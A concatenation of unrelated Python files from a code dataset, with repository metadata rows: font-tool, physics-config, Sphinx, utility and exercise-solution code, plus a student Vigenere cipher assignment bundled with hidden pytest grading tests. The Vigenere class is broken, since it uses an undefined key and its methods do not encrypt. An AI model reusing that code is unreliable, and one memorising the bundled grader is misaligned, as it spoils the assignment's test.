if thisFont is None:
Message(title="No Font Open", message="The script requires a font. Open a font and run the script again.", OKButton=None)
else:
print("Component Problem Finder Report for %s" % thisFont.familyName)
if thisFont.filepath:
print(thisFont.filepath)
else:
print("⚠️ The font file has not been saved yet.")
print()
if self.pref("includeAllGlyphs"):
glyphs = thisFont.glyphs
else:
glyphs = [l.parent for l in thisFont.selectedLayers]
enabledPrefNames = [p for p in self.prefs[:-3] if self.pref(p)]
glyphDict = {}
for dictKey in enabledPrefNames:
glyphDict[dictKey] = []
shouldIncludeNonExporting = self.pref("includeNonExporting")
glyphCount = len(glyphs)
for i, thisGlyph in enumerate(glyphs):
self.w.progress.set(100 * i / glyphCount)
report = "🔠 %s" % thisGlyph.name
print(report)
self.w.status.set(report)
if shouldIncludeNonExporting or thisGlyph.export:
for prefName in enabledPrefNames:
if Glyphs.defaults[self.domain(prefName)]:
methodName = "glyphHas_%s" % prefName
isAffected = self.callMethodWithArg(methodName, thisGlyph)
if isAffected:
glyphDict[prefName].append(thisGlyph.name)
report = ""
for prefName in enabledPrefNames:
affectedGlyphs = glyphDict[prefName]
if affectedGlyphs:
report += "\n%s:\n%s\n" % (
" ".join(camelCaseSplit(prefName)).capitalize(),
"/" + "/".join(affectedGlyphs),
)
print(report)
if self.pref("reuseTab") and thisFont.currentTab:
newTab = thisFont.currentTab
else:
newTab = thisFont.newTab()
newTab.text = report.strip()
# take time:
end = timer()
timereport = reportTimeInNaturalLanguage(end - start)
print("Time elapsed: %s" % timereport)
self.w.status.set("✅ Done. %s." % timereport)
self.w.progress.set(100)
# Final report:
Glyphs.showNotification(
"%s: Done" % (thisFont.familyName),
"Component Problem Finder is finished. Details in Macro Window",
)
print("\nDone.")
except Exception as e:
# brings macro window to front and reports error:
Glyphs.showMacroWindow()
print("Component Problem Finder Error: %s" % e)
import traceback
print(traceback.format_exc())
ComponentProblemFinder()
|
[
"res@glyphsapp.com"
] |
res@glyphsapp.com
|
4d9725de9f5d6415c6a02d66311fb489c305c554
|
a81a1efe1a93d5af0ef3f6403862a1544befd6cf
|
/HashTable/387_FirstUniqueCharacterInAString.py
|
b2a92fa927e8f971aa0b15b6b3070f9234e20fc0
|
[] |
no_license
|
fishleongxhh/LeetCode
|
89da4ae3ca1715b1909c350437c0ba79eb2a8349
|
d0352fecc61396fc460e1350572189b175a13f61
|
refs/heads/master
| 2020-04-05T17:14:27.976946
| 2018-12-16T14:10:54
| 2018-12-16T14:10:54
| 157,050,997
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 526
|
py
|
# -*- coding: utf-8 -*-
# Author: Xu Hanhui
# 此程序用来求解LeetCode387: First Unique Character in a String问题
def firstUniqChar(s):
dic = {}
uniq_str = set()
for loc, item in enumerate(s):
if item in dic:
uniq_str.discard(item)
else:
dic[item] = loc
uniq_str.add(item)
res = [dic[item] for item in uniq_str]
if res:
return min(res)
return -1
if __name__ == "__main__":
s = 'huhuihui'
print(s)
print(firstUniqChar(s))
|
[
"xhh1120132805@163.com"
] |
xhh1120132805@163.com
|
1c6dff9a338a0153cfabc16870bab5f9d1330b5b
|
f31fda8014ecadf6af7d4e3392fb917c49e0352a
|
/HeavyIonsAnalysis/JetAnalysis/python/jets/akFilter2PFJetSequence_PbPb_data_cff.py
|
1a674d6fbc2a55e627708930cc51a3f29f18138e
|
[] |
no_license
|
jniedzie/lightbylight
|
acea5051f053c49824a49a0b78bac3a2247ee75f
|
f5a4661fcf3fd3c0e9ccd8893a46a238e30c2aa8
|
refs/heads/master
| 2020-03-18T12:24:31.970468
| 2018-02-09T15:50:00
| 2018-02-09T15:50:00
| 134,724,759
| 0
| 1
| null | 2018-05-24T14:11:12
| 2018-05-24T14:11:12
| null |
UTF-8
|
Python
| false
| false
| 14,619
|
py
|
import FWCore.ParameterSet.Config as cms
from HeavyIonsAnalysis.JetAnalysis.patHeavyIonSequences_cff import patJetGenJetMatch, patJetPartonMatch, patJetCorrFactors, patJets
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
from HeavyIonsAnalysis.JetAnalysis.bTaggers_cff import *
from RecoJets.JetProducers.JetIDParams_cfi import *
from RecoJets.JetProducers.nJettinessAdder_cfi import Njettiness
akFilter2PFmatch = patJetGenJetMatch.clone(
src = cms.InputTag("akFilter2PFJets"),
matched = cms.InputTag("ak2HiSignalGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.2
)
akFilter2PFmatchGroomed = patJetGenJetMatch.clone(
src = cms.InputTag("akFilter2HiGenJets"),
matched = cms.InputTag("ak2HiSignalGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.2
)
akFilter2PFparton = patJetPartonMatch.clone(src = cms.InputTag("akFilter2PFJets")
)
akFilter2PFcorr = patJetCorrFactors.clone(
useNPV = cms.bool(False),
useRho = cms.bool(False),
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("akFilter2PFJets"),
payload = "AK2PF_offline"
)
akFilter2PFJetID= cms.EDProducer('JetIDProducer', JetIDParams, src = cms.InputTag('akFilter2CaloJets'))
#akFilter2PFclean = heavyIonCleanedGenJets.clone(src = cms.InputTag('ak2HiSignalGenJets'))
akFilter2PFbTagger = bTaggers("akFilter2PF",0.2)
#create objects locally since they dont load properly otherwise
#akFilter2PFmatch = akFilter2PFbTagger.match
akFilter2PFparton = patJetPartonMatch.clone(src = cms.InputTag("akFilter2PFJets"), matched = cms.InputTag("hiSignalGenParticles"))
akFilter2PFPatJetFlavourAssociationLegacy = akFilter2PFbTagger.PatJetFlavourAssociationLegacy
akFilter2PFPatJetPartons = akFilter2PFbTagger.PatJetPartons
akFilter2PFJetTracksAssociatorAtVertex = akFilter2PFbTagger.JetTracksAssociatorAtVertex
akFilter2PFJetTracksAssociatorAtVertex.tracks = cms.InputTag("highPurityTracks")
akFilter2PFSimpleSecondaryVertexHighEffBJetTags = akFilter2PFbTagger.SimpleSecondaryVertexHighEffBJetTags
akFilter2PFSimpleSecondaryVertexHighPurBJetTags = akFilter2PFbTagger.SimpleSecondaryVertexHighPurBJetTags
akFilter2PFCombinedSecondaryVertexBJetTags = akFilter2PFbTagger.CombinedSecondaryVertexBJetTags
akFilter2PFCombinedSecondaryVertexV2BJetTags = akFilter2PFbTagger.CombinedSecondaryVertexV2BJetTags
akFilter2PFJetBProbabilityBJetTags = akFilter2PFbTagger.JetBProbabilityBJetTags
akFilter2PFSoftPFMuonByPtBJetTags = akFilter2PFbTagger.SoftPFMuonByPtBJetTags
akFilter2PFSoftPFMuonByIP3dBJetTags = akFilter2PFbTagger.SoftPFMuonByIP3dBJetTags
akFilter2PFTrackCountingHighEffBJetTags = akFilter2PFbTagger.TrackCountingHighEffBJetTags
akFilter2PFTrackCountingHighPurBJetTags = akFilter2PFbTagger.TrackCountingHighPurBJetTags
akFilter2PFPatJetPartonAssociationLegacy = akFilter2PFbTagger.PatJetPartonAssociationLegacy
akFilter2PFImpactParameterTagInfos = akFilter2PFbTagger.ImpactParameterTagInfos
akFilter2PFImpactParameterTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
akFilter2PFJetProbabilityBJetTags = akFilter2PFbTagger.JetProbabilityBJetTags
akFilter2PFSecondaryVertexTagInfos = akFilter2PFbTagger.SecondaryVertexTagInfos
akFilter2PFSimpleSecondaryVertexHighEffBJetTags = akFilter2PFbTagger.SimpleSecondaryVertexHighEffBJetTags
akFilter2PFSimpleSecondaryVertexHighPurBJetTags = akFilter2PFbTagger.SimpleSecondaryVertexHighPurBJetTags
akFilter2PFCombinedSecondaryVertexBJetTags = akFilter2PFbTagger.CombinedSecondaryVertexBJetTags
akFilter2PFCombinedSecondaryVertexV2BJetTags = akFilter2PFbTagger.CombinedSecondaryVertexV2BJetTags
akFilter2PFSecondaryVertexNegativeTagInfos = akFilter2PFbTagger.SecondaryVertexNegativeTagInfos
akFilter2PFNegativeSimpleSecondaryVertexHighEffBJetTags = akFilter2PFbTagger.NegativeSimpleSecondaryVertexHighEffBJetTags
akFilter2PFNegativeSimpleSecondaryVertexHighPurBJetTags = akFilter2PFbTagger.NegativeSimpleSecondaryVertexHighPurBJetTags
akFilter2PFNegativeCombinedSecondaryVertexBJetTags = akFilter2PFbTagger.NegativeCombinedSecondaryVertexBJetTags
akFilter2PFPositiveCombinedSecondaryVertexBJetTags = akFilter2PFbTagger.PositiveCombinedSecondaryVertexBJetTags
akFilter2PFNegativeCombinedSecondaryVertexV2BJetTags = akFilter2PFbTagger.NegativeCombinedSecondaryVertexV2BJetTags
akFilter2PFPositiveCombinedSecondaryVertexV2BJetTags = akFilter2PFbTagger.PositiveCombinedSecondaryVertexV2BJetTags
akFilter2PFSoftPFMuonsTagInfos = akFilter2PFbTagger.SoftPFMuonsTagInfos
akFilter2PFSoftPFMuonsTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
akFilter2PFSoftPFMuonBJetTags = akFilter2PFbTagger.SoftPFMuonBJetTags
akFilter2PFSoftPFMuonByIP3dBJetTags = akFilter2PFbTagger.SoftPFMuonByIP3dBJetTags
akFilter2PFSoftPFMuonByPtBJetTags = akFilter2PFbTagger.SoftPFMuonByPtBJetTags
akFilter2PFNegativeSoftPFMuonByPtBJetTags = akFilter2PFbTagger.NegativeSoftPFMuonByPtBJetTags
akFilter2PFPositiveSoftPFMuonByPtBJetTags = akFilter2PFbTagger.PositiveSoftPFMuonByPtBJetTags
akFilter2PFPatJetFlavourIdLegacy = cms.Sequence(akFilter2PFPatJetPartonAssociationLegacy*akFilter2PFPatJetFlavourAssociationLegacy)
#Not working with our PU sub, but keep it here for reference
#akFilter2PFPatJetFlavourAssociation = akFilter2PFbTagger.PatJetFlavourAssociation
#akFilter2PFPatJetFlavourId = cms.Sequence(akFilter2PFPatJetPartons*akFilter2PFPatJetFlavourAssociation)
akFilter2PFJetBtaggingIP = cms.Sequence(akFilter2PFImpactParameterTagInfos *
(akFilter2PFTrackCountingHighEffBJetTags +
akFilter2PFTrackCountingHighPurBJetTags +
akFilter2PFJetProbabilityBJetTags +
akFilter2PFJetBProbabilityBJetTags
)
)
akFilter2PFJetBtaggingSV = cms.Sequence(akFilter2PFImpactParameterTagInfos
*
akFilter2PFSecondaryVertexTagInfos
* (akFilter2PFSimpleSecondaryVertexHighEffBJetTags+
akFilter2PFSimpleSecondaryVertexHighPurBJetTags+
akFilter2PFCombinedSecondaryVertexBJetTags+
akFilter2PFCombinedSecondaryVertexV2BJetTags
)
)
akFilter2PFJetBtaggingNegSV = cms.Sequence(akFilter2PFImpactParameterTagInfos
*
akFilter2PFSecondaryVertexNegativeTagInfos
* (akFilter2PFNegativeSimpleSecondaryVertexHighEffBJetTags+
akFilter2PFNegativeSimpleSecondaryVertexHighPurBJetTags+
akFilter2PFNegativeCombinedSecondaryVertexBJetTags+
akFilter2PFPositiveCombinedSecondaryVertexBJetTags+
akFilter2PFNegativeCombinedSecondaryVertexV2BJetTags+
akFilter2PFPositiveCombinedSecondaryVertexV2BJetTags
)
)
akFilter2PFJetBtaggingMu = cms.Sequence(akFilter2PFSoftPFMuonsTagInfos * (akFilter2PFSoftPFMuonBJetTags
+
akFilter2PFSoftPFMuonByIP3dBJetTags
+
akFilter2PFSoftPFMuonByPtBJetTags
+
akFilter2PFNegativeSoftPFMuonByPtBJetTags
+
akFilter2PFPositiveSoftPFMuonByPtBJetTags
)
)
akFilter2PFJetBtagging = cms.Sequence(akFilter2PFJetBtaggingIP
*akFilter2PFJetBtaggingSV
*akFilter2PFJetBtaggingNegSV
# *akFilter2PFJetBtaggingMu
)
akFilter2PFpatJetsWithBtagging = patJets.clone(jetSource = cms.InputTag("akFilter2PFJets"),
genJetMatch = cms.InputTag("akFilter2PFmatch"),
genPartonMatch = cms.InputTag("akFilter2PFparton"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("akFilter2PFcorr")),
JetPartonMapSource = cms.InputTag("akFilter2PFPatJetFlavourAssociationLegacy"),
JetFlavourInfoSource = cms.InputTag("akFilter2PFPatJetFlavourAssociation"),
trackAssociationSource = cms.InputTag("akFilter2PFJetTracksAssociatorAtVertex"),
useLegacyJetMCFlavour = True,
discriminatorSources = cms.VInputTag(cms.InputTag("akFilter2PFSimpleSecondaryVertexHighEffBJetTags"),
cms.InputTag("akFilter2PFSimpleSecondaryVertexHighPurBJetTags"),
cms.InputTag("akFilter2PFCombinedSecondaryVertexBJetTags"),
cms.InputTag("akFilter2PFCombinedSecondaryVertexV2BJetTags"),
cms.InputTag("akFilter2PFJetBProbabilityBJetTags"),
cms.InputTag("akFilter2PFJetProbabilityBJetTags"),
#cms.InputTag("akFilter2PFSoftPFMuonByPtBJetTags"),
#cms.InputTag("akFilter2PFSoftPFMuonByIP3dBJetTags"),
cms.InputTag("akFilter2PFTrackCountingHighEffBJetTags"),
cms.InputTag("akFilter2PFTrackCountingHighPurBJetTags"),
),
jetIDMap = cms.InputTag("akFilter2PFJetID"),
addBTagInfo = True,
addTagInfos = True,
addDiscriminators = True,
addAssociatedTracks = True,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = False,
addGenPartonMatch = False,
addGenJetMatch = False,
embedGenJetMatch = False,
embedGenPartonMatch = False,
# embedCaloTowers = False,
# embedPFCandidates = True
)
akFilter2PFNjettiness = Njettiness.clone(
src = cms.InputTag("akFilter2PFJets"),
R0 = cms.double( 0.2)
)
akFilter2PFpatJetsWithBtagging.userData.userFloats.src += ['akFilter2PFNjettiness:tau1','akFilter2PFNjettiness:tau2','akFilter2PFNjettiness:tau3']
akFilter2PFJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("akFilter2PFpatJetsWithBtagging"),
genjetTag = 'ak2HiGenJets',
rParam = 0.2,
matchJets = cms.untracked.bool(False),
matchTag = 'patJetsWithBtagging',
pfCandidateLabel = cms.untracked.InputTag('particleFlowTmp'),
trackTag = cms.InputTag("hiGeneralTracks"),
fillGenJets = False,
isMC = False,
doSubEvent = False,
useHepMC = cms.untracked.bool(False),
genParticles = cms.untracked.InputTag("genParticles"),
eventInfoTag = cms.InputTag("generator"),
doLifeTimeTagging = cms.untracked.bool(True),
doLifeTimeTaggingExtras = cms.untracked.bool(False),
bTagJetName = cms.untracked.string("akFilter2PF"),
jetName = cms.untracked.string("akFilter2PF"),
genPtMin = cms.untracked.double(5),
hltTrgResults = cms.untracked.string('TriggerResults::'+'HISIGNAL'),
doTower = cms.untracked.bool(True),
doSubJets = cms.untracked.bool(True),
doGenSubJets = cms.untracked.bool(False),
subjetGenTag = cms.untracked.InputTag("akFilter2GenJets"),
doGenTaus = False
)
akFilter2PFJetSequence_mc = cms.Sequence(
#akFilter2PFclean
#*
akFilter2PFmatch
#*
#akFilter2PFmatchGroomed
*
akFilter2PFparton
*
akFilter2PFcorr
*
#akFilter2PFJetID
#*
akFilter2PFPatJetFlavourIdLegacy
#*
#akFilter2PFPatJetFlavourId # Use legacy algo till PU implemented
*
akFilter2PFJetTracksAssociatorAtVertex
*
akFilter2PFJetBtagging
*
akFilter2PFNjettiness
*
akFilter2PFpatJetsWithBtagging
*
akFilter2PFJetAnalyzer
)
akFilter2PFJetSequence_data = cms.Sequence(akFilter2PFcorr
*
#akFilter2PFJetID
#*
akFilter2PFJetTracksAssociatorAtVertex
*
akFilter2PFJetBtagging
*
akFilter2PFNjettiness
*
akFilter2PFpatJetsWithBtagging
*
akFilter2PFJetAnalyzer
)
akFilter2PFJetSequence_jec = cms.Sequence(akFilter2PFJetSequence_mc)
akFilter2PFJetSequence_mb = cms.Sequence(akFilter2PFJetSequence_mc)
akFilter2PFJetSequence = cms.Sequence(akFilter2PFJetSequence_data)
|
[
"rchudasa@cern.ch"
] |
rchudasa@cern.ch
|
148ee2aa423bec48565132b2a7ea8db0853d712d
|
be6b8e5f65ab1e86e72d4a70a6bcfe0891458df1
|
/sigfig.py
|
3bdf3596edba9f1336625991197baeb64b8616c7
|
[] |
no_license
|
annayqho/papers
|
c406185485ef447b4aebf0d37011e79ef4f872fb
|
527bab334f118e77eeb028ed1a787be3b887724c
|
refs/heads/master
| 2021-07-10T05:18:47.134685
| 2017-10-12T02:38:32
| 2017-10-12T02:38:32
| 100,283,607
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 499
|
py
|
import numpy as np
from math import log10, floor
def round_sig(x, sig=2):
if x == 0:
return 0
elif x < 0:
return -round(-x, sig-int(floor(log10(-x)))-1)
return round(x, sig-int(floor(log10(x)))-1)
def ndec(num):
dec = str(num).split('.')[-1]
return len(dec)
def format_val(val, sig):
valrd = round_sig(val, 2)
sigrd = np.round(sig, ndec(valrd))
val_str = str(valrd) + "$\pm$" + str(sigrd)
if val < 0:
val_str = ""
return val_str
|
[
"annayqho@gmail.com"
] |
annayqho@gmail.com
|
96a9a0075629c44cfce0d3f9471369f36b35ffd9
|
238e46a903cf7fac4f83fa8681094bf3c417d22d
|
/VTK/vtk_7.1.1_x64_Release/lib/python2.7/site-packages/twisted/pair/_version.py
|
6203753e169cead8711dc820254d774becccc3be
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
baojunli/FastCAE
|
da1277f90e584084d461590a3699b941d8c4030b
|
a3f99f6402da564df87fcef30674ce5f44379962
|
refs/heads/master
| 2023-02-25T20:25:31.815729
| 2021-02-01T03:17:33
| 2021-02-01T03:17:33
| 268,390,180
| 1
| 0
|
BSD-3-Clause
| 2020-06-01T00:39:31
| 2020-06-01T00:39:31
| null |
UTF-8
|
Python
| false
| false
| 271
|
py
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
# This is an auto-generated file. Do not edit it.
"""
Provides Twisted version information.
"""
from twisted.python import versions
version = versions.Version('twisted.pair', 14, 0, 0)
|
[
"l”ibaojunqd@foxmail.com“"
] |
l”ibaojunqd@foxmail.com“
|
ad05a82658610e10819bc5ab5fb7c68d5f100362
|
ff6248be9573caec94bea0fa2b1e4b6bf0aa682b
|
/raw_scripts/132.230.102.123-10.21.12.20/1569576510.py
|
641aacf6e240b35309990accd5d2be629609eef6
|
[] |
no_license
|
LennartElbe/codeEvo
|
0e41b1a7705204e934ef71a5a28c047366c10f71
|
e89b329bc9edd37d5d9986f07ca8a63d50686882
|
refs/heads/master
| 2020-12-21T17:28:25.150352
| 2020-03-26T10:22:35
| 2020-03-26T10:22:35
| 236,498,032
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,019
|
py
|
import functools
import typing
import string
import random
import pytest
## Lösung Teile 1. und 2.
class Vigenere:
def __init__(self, keyword, encrypt, decrypt):
self.key = key
self.encrypt = encrypt
self.decrypt = decrypt
def encrypt(x : str):
return x.upper
def decrypt(y : str):
return y.upper
######################################################################
## hidden code
def mk_coverage():
covered = set()
target = set(range(6))
count = 0
def coverage(func):
nonlocal covered, target, count
def wrapper(key):
nonlocal covered, count
if key == "A":
covered.add(0)
elif key != "":
covered.add(1)
if len (key) > 1:
covered.add(2)
if key == key[0] * len (key):
covered.add(4)
else:
covered.add(5)
if len (key) > 2:
covered.add (3)
r = func (key)
count += 1
return r
if func == "achieved": return len(covered)
if func == "required": return len(target)
if func == "count" : return count
functools.update_wrapper (wrapper, func)
return wrapper
return coverage
coverage = mk_coverage ()
try:
Vigenere = coverage (Vigenere)
except:
pass
## Lösung Teil 3. (Tests)
######################################################################
## hidden tests
pytest.main (["-v", "--assert=plain", "-p", "no:cacheprovider"])
from inspect import getfullargspec
class TestNames:
def test_Vigenere (self):
assert Vigenere
def test_encrypt(self):
assert Vigenere.encrypt
assert 'w' in getfullargspec(Vigenere.encrypt).args
def test_decrypt(self):
assert Vigenere.decrypt
assert 'w' in getfullargspec(Vigenere.decrypt).args
class TestGrades:
def test_coverage(self):
assert coverage("achieved") == coverage("required")
def test_Vigenere_is_a_class(self):
assert "class" in repr (Vigenere.__wrapped__)
def test_docstring_present(self):
assert Vigenere.__doc__ is not None
assert Vigenere.encrypt.__doc__ is not None
assert Vigenere.decrypt.__doc__ is not None
def test_empty_key (self):
with pytest.raises (Exception):
assert Vigenere ("")
def test_has_key(self):
k = "asfdg"
v = Vigenere(k)
assert v.key == k
def test_has_methods(self):
v = Vigenere("")
assert v.encrypt
assert v.decrypt
def test_identity(self):
charset = string.ascii_uppercase
v = Vigenere ("A")
for i in range (100):
s = ''.join(random.choice (charset) for j in range (100))
assert v.encrypt(s) == s
assert v.decrypt(s) == s
def test_inverses(self):
charset = string.ascii_uppercase
for i in range (100):
k = ''.join(random.choice (charset) for j in range (random.randrange (1,20)))
v = Vigenere (k)
for n in range (10):
s = ''.join(random.choice (charset) for j in range (100))
assert v.decrypt(v.encrypt(s)) == s
def test_shift (self):
charset = string.ascii_uppercase
for i in range (100):
k = random.choice (charset)
ok = ord (k) - ord ('A')
v = Vigenere (k * random.randrange (1, 100))
s = ''.join(random.choice (charset) for j in range (100))
se = v.encrypt (s)
assert len (se) == len (s)
for x, xe in zip (s, se):
d = (26 + ord (xe) - ord (x)) % 26
assert d == ok
sd = v.decrypt (s)
assert len (sd) == len (s)
for x, xd in zip (s, sd):
d = (26 + ord (x) - ord (xd)) % 26
assert d == ok
|
[
"lenni.elbe@gmail.com"
] |
lenni.elbe@gmail.com
|
232499e5789d32aef85d5d3d8bef8407bdaa9cb7
|
ae672becf06e084728388e2ca1fb72ca786336d2
|
/chapter_08/exercise_8_4.py
|
5c3ca3fe1e715841932ad35f802661267a72ad24
|
[] |
no_license
|
kexiaojiu/python_based_programming
|
d9631ba3aa0636d9b01020a7711834ba15d4843c
|
bd497479037856de6ef5852902e3352afb5c7cc9
|
refs/heads/master
| 2018-10-04T22:37:11.908957
| 2018-08-07T13:54:44
| 2018-08-07T13:54:44
| 116,146,067
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 233
|
py
|
#!/usr/bin/env python3
def make_shirt(size, text='I love Python'):
print("The size of the shirt is " + str(size) + " ,and it's text is " +
text + "." )
make_shirt('big')
make_shirt('middle')
make_shirt('small', 'I love China')
|
[
"kexiaojiu@163.com"
] |
kexiaojiu@163.com
|
7cf38f77e6652d444241e8aa1a1c3c5a15945497
|
1872b89ba17a08db60d58551f073a6b4e0d31a50
|
/instrument_server/commands/command_parser.py
|
ea64dcc7971e724d84b863439d90b5abc4ba6f33
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
Terrabits/instrument-server
|
f6e4c40d8e9835ada150dc0a8245024505d0a7d7
|
a4950099410ac81b37516aeefcc6072d9865ba4e
|
refs/heads/master
| 2022-05-28T01:27:25.051729
| 2022-04-29T22:53:39
| 2022-04-29T22:53:39
| 189,175,077
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,196
|
py
|
from .mixins import RaiseErrorMixin
import re
class CommandParser(RaiseErrorMixin):
def __init__(self, command, args={}):
RaiseErrorMixin.__init__(self)
self.command = command
self.args = args
def is_match(self, command_bytes):
regex = f'^{self.command}\\s*'.replace('?', r'\?').encode()
matches = re.match(regex, command_bytes)
return matches is not None
def parse_args(self, command_bytes):
values = command_bytes.strip().split()[1:]
if len(values) < len(self.args):
self.raise_error('too few arguments')
if len(values) > len(self.args):
self.raise_error('too many arguments')
args = {}
for name, type, value in zip(self.args.keys(), self.args.values(), values):
if type:
try: # type(arg), catch Exception
typed_value = type(value)
except Exception:
self.raise_error(f"'{value}' could not be converted to {type}")
args[name] = typed_value
else:
# decode bytes to str
args[name] = value.decode()
return args
|
[
"nick.lalic@gmail.com"
] |
nick.lalic@gmail.com
|
9d06c4edefa4ba7412c5c85dd29d8babd72b8034
|
d3750f32f8bc8a961de778f313a547e8636621e3
|
/docs/conf.py
|
02524b2634ac9ea5185b817381ebece9804fe68f
|
[
"BSD-3-Clause"
] |
permissive
|
diamond0411/ndexncipidloader
|
506e26b9ea8c716fb08dcaf72b138e557ce5b227
|
cf1519bd7e9ada30e00df56011180a9069e4e967
|
refs/heads/master
| 2020-06-13T19:09:19.466283
| 2019-07-16T16:30:23
| 2019-07-16T16:30:23
| 194,761,167
| 1
| 1
|
NOASSERTION
| 2019-07-02T00:40:05
| 2019-07-02T00:40:05
| null |
UTF-8
|
Python
| false
| false
| 4,970
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# ndexncipidloader documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 9 13:47:02 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
import ndexncipidloader
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'NDEx NCI-PID content loader'
copyright = u"2019, Chris Churas"
author = u"Chris Churas"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = ndexncipidloader.__version__
# The full version, including alpha/beta/rc tags.
release = ndexncipidloader.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ---------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'ndexncipidloaderdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto, manual, or own class]).
latex_documents = [
(master_doc, 'ndexncipidloader.tex',
u'NDEx NCI-PID content loader Documentation',
u'Chris Churas', 'manual'),
]
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'ndexncipidloader',
u'NDEx NCI-PID content loader Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'ndexncipidloader',
u'NDEx NCI-PID content loader Documentation',
author,
'ndexncipidloader',
'One line description of project.',
'Miscellaneous'),
]
|
[
"churas.camera@gmail.com"
] |
churas.camera@gmail.com
|
635fd1995cbe947847215eec469862f6d76b83ea
|
bc7199ee3cb7139ac90788cd0469c91d48315797
|
/demo/assignments/unique_chars_2.py
|
0732c380b26e374b09aef426f7cdf5ef0ca1af56
|
[] |
no_license
|
srikanthpragada/python_14_dec_2020
|
617039e15285d84c8503ba49994aec08096d46f9
|
78c046b4aaf9590211dea447c08507969e053e60
|
refs/heads/master
| 2023-02-24T17:41:41.807841
| 2021-02-01T02:17:40
| 2021-02-01T02:17:40
| 322,155,634
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 120
|
py
|
chars = set()
names = ['Bob', 'Joe', 'John', 'Scott', 'Joseph']
for name in names:
chars |= set(name)
print(chars)
|
[
"srikanthpragada@gmail.com"
] |
srikanthpragada@gmail.com
|
f12bc2202d1d785c55b97d61b4bdb753af43f43f
|
1e84a9fec36deaf9a55a2734749ea035f72ac869
|
/KAKAO BLIND RECRUITMENT/2018/1차/오픈채팅방/다시풀기.py
|
d45e1623d4e94692ba8b281ad8cadaaccec56d79
|
[] |
no_license
|
mgh3326/programmers_algorithm
|
aa3afc91231550e1fec2d72d90e85b140f79d677
|
b62f08ccccbdcac71e484d508985a5a9ce5f2434
|
refs/heads/master
| 2022-08-31T04:19:15.728666
| 2022-07-31T14:02:26
| 2022-07-31T14:02:26
| 201,747,526
| 0
| 0
| null | 2022-07-23T10:19:13
| 2019-08-11T10:02:15
|
Python
|
UTF-8
|
Python
| false
| false
| 965
|
py
|
def solution(record):
answer = []
user_name_dict = {}
saved_list = []
for record_value in record:
split = record_value.split()
if split[0] == "Enter":
user_name_dict[split[1]] = split[2]
saved_list.append([split[1], split[0]])
elif split[0] == "Leave":
saved_list.append([split[1], split[0]])
elif split[0] == "Change":
user_name_dict[split[1]] = split[2]
for saved in saved_list:
out_str = ""
